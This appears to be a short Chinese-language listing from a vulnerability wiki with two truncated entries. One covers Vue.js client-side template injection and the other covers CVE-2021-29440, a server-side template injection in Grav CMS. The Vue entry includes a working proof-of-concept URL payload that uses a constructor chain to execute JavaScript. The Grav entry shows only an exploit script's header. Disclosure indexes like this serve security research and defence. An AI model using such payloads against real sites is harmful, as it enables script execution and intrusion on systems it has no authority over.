Vue.js Javascript library客户端模板注入漏洞 免费、自由、人人(PwnWiki.Com)可编辑的漏洞库 , POC http://host/?name={{this.constructor.constructor('alert("foo")')()}} 免费、自由、人人可编辑的漏洞库- ... 阅读全文
CVE-2021-29440 Grav CMS 1.7.10 服务器端模板注入漏洞 免费、自由、人人可编辑的漏洞库 , EXP # Title: Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated) # Author: enox # ... 阅读全文